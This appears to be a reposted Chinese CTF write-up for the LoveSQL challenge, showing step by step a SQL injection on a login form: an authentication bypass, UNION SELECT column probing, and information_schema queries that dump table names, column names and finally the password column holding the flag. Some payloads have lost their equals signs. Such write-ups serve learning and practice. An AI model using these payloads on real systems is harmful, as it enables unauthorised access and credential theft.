新闻详情

新闻详情

首页 / 资讯中心 / 详情

[极客大挑战 2019]LoveSQL_CTF2

发布时间:2026/9/28 21:16:56来源:尧图网络
[极客大挑战 2019]LoveSQL_CTF2
靶场环境用户登陆页面展示解题过程步骤一进入靶场后看见用户名和密码框用户名输入1 or 11#密码输入1成功登录回显尝试提交CTF2{c8bffd77808d7e311653f36a7907de3a}和c8bffd77808d7e311653f36a7907de3a都失败了说明这不是flag。步骤二通过 UNION SELECT 1,2,3#尝试出有三列而第二列会回显故构造 UNION SELECT 1,database(),3#来获取当前数据库名(database()是内置函数用于获取当前数据库名)步骤三构造获取数据库表名的payload。Payload1: union select 1,(select table_name from information_schema.tables where table_schemageek limit 0,1),3#返回第一个表名为 geekuser。Payload2: union select 1,(select table_name from information_schema.tables where table_schemageek limit 1,1),3#返回第二个表名为 I0ve1ysq1。Payload3: union select 1,(select table_name from information_schema.tables where table_schemageek limit 2,1),3#未返回表名。所以现在我们知道了geek库里有两个表表名分别是geekuser和l0ve1ysq1。步骤四接下来我们尝试从表中获取列名构造获取特定表的列名的payload。 union select 1,(select column_name from information_schema.columns where table_schemageek and table_namegeekuser limit 0,1),3# id union select 1,(select column_name from information_schema.columns where table_schemageek and table_namegeekuser limit 1,1),3# username union select 1,(select column_name from information_schema.columns where table_schemageek and table_namegeekuser limit 1,1),3# password union select 1,(select column_name from information_schema.columns where table_schemageek and table_namel0ve1ysq1 limit 0,1),3# id union select 1,(select column_name from information_schema.columns where table_schemageek and table_namel0ve1ysq1 limit 1,1),3# username union select 1,(select column_name from information_schema.columns where table_schemageek and table_namel0ve1ysq1 limit 2,1),3# password以上payload是我列举的六个上面三个查询geekuser表下三个查询l0ve1ysq1表分别返回参数 id, username, password。 我们通过更改limit n, 1 (n0,1,2,3,4,5,6,7,8......)挨个表查里面的数据经过一番紧张刺激的查询成功在l0ve1ysq1表的password列的第16个字段里找到了flag。payload:union select 1,(select password from l0ve1ysq1 limit 15,1),3#
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

开源模型端侧落地实战:量化、推理加速与Agent上下文管理 2026/9/28 23:59:38

开源模型端侧落地实战:量化、推理加速与Agent上下文管理

1. 从"追平"到"端侧落地":开源模型这波到底变了什么如果你最近半年一直在关注模型圈的动态,应该能明显感觉到一个拐点:开源模型和闭源旗舰之间的差距,正在从"代差"变成"身位差"。以前大家…

阅读更多 →
Java采购管理系统实战:从数据库设计到事务一致性 2026/9/28 23:59:25

Java采购管理系统实战:从数据库设计到事务一致性

简介:这是一套面向Java Web初学者与课程设计者的采购管理系统完整源码,采用JSP技术搭建,配合MySQL数据库,用于解决企业采购信息的管理问题,适合作为毕业设计、课程大作业或进销存类项目的参考模板。系统实现了用户登录…

阅读更多 →
AI Evals实战指南:从零搭建LLM应用评估体系与CI/CD集成 2026/9/28 23:59:25

AI Evals实战指南:从零搭建LLM应用评估体系与CI/CD集成

1. 为什么AI Evals值得你花时间搞明白做LLM应用的人,迟早会撞上同一堵墙:模型输出飘忽不定,今天答得好好的,明天换个问法就胡说八道。你改了一版提示词,感觉好像好了点,但到底好了多少?说不清。…

阅读更多 →
LSTM时间序列预测实战:从数据窗口构造到模型调参避坑 2026/9/28 23:59:18

LSTM时间序列预测实战:从数据窗口构造到模型调参避坑

简介:这份资源面向高校学生与Python初学者,提供一套可直接运行的LSTM时间序列预测完整项目,适用于期末大作业、课程设计及入门级深度学习实践。项目以空气质量等真实数据为样本,覆盖数据预处理、模型搭建、训练与预测全流程&#…

阅读更多 →
LSTM时间序列预测实战:从期末大作业到可复现Python源码 2026/9/28 23:59:12

LSTM时间序列预测实战:从期末大作业到可复现Python源码

简介:这份资源面向高校学生与Python初学者,提供一套可直接运行的LSTM时间序列预测完整项目,适用于期末大作业、课程设计或入门深度学习实践。项目以空气质量等真实序列数据为样本,覆盖数据读取、预处理、模型搭建、训练与预测全流…

阅读更多 →
LLM红队实战:从攻击面枚举到防护策略的完整方法论 2026/9/28 23:59:12

LLM红队实战:从攻击面枚举到防护策略的完整方法论

1. 从“Lysios”这个名字说起:LLM红队到底在防什么第一次看到“Lysios – LLM red teaming org”这个标题,很多人会愣一下:Lysios是什么?是一个开源工具、一个组织代号,还是一套方法论?从命名习惯来看&…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞 ✉